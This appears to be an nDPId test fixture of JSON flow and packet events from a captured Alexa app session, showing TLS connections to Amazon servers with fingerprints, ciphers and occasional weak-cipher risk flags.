+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047050,"flow_last_seen":1490976047050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047050,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1490976047050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047050,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8zEVAAEAGR+WsECrYNu8YuoTyAbvILJz0AAAAAKAC\/\/\/j9wAAAgQFtAQCCAoA9lCxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1490976047071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047071,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYANAAOcGDTM27xi6rBAq2AG7hPHQ2dGWKLR0gXASH\/53JwAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1490976047073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047073,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJC5AAEAG8BCsECrYNu8YuoTxAbsotHSB0NnRl1AQAVfBmAAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047014,"flow_last_seen":1490976047075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047075,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047096,"flow_last_seen":1490976047096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047096,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1490976047096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047096,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Q4ZAAEAGA2msECrYNF7ohrJzAbuRhBMzAAAAAKAC\/\/+poAAAAgQFtAQCCAoA9lC1AAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1490976047107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047107,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwYitAAOcGCws27xi6rBAq2AG7hPIGkxHQyCyc9XASH\/45RwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1490976047109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047109,"pkt":"AMDKkaPvePiC0\/vCCABFAAAozEZAAEAGR\/isECrYNu8YuoTyAbvILJz1BpMR0VAQAVeDuAAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047050,"flow_last_seen":1490976047111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047111,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047014,"flow_last_seen":1490976047133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047133,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1490976047154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047154,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwRp1AAOcGWV00XuiGrBAq2AG7snPq5wFokYQTNHASH\/4rBwAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1490976047155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047155,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoQ4dAAEAGA3ysECrYNF7ohrJzAbuRhBM06ucBaVAQAVd1eAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047096,"flow_last_seen":1490976047156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":641,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047050,"flow_last_seen":1490976047169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047169,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976047096,"flow_last_seen":1490976047217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976047217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047560,"flow_last_seen":1490976047560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1490976047560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047560,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8csJAAEAG6uOsECrYNFXR2NSbAbtgrSImAAAAAKAC\/\/+\/5AAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047563,"flow_last_seen":1490976047563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047563,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1490976047563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047563,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8y+FAAEAGgVWsECrYSBXOh6SfAbuD+JsFAAAAAKAC\/\/9DRwAAAgQFtAQCCAoA9lDkAAAAAAEDAwg="} 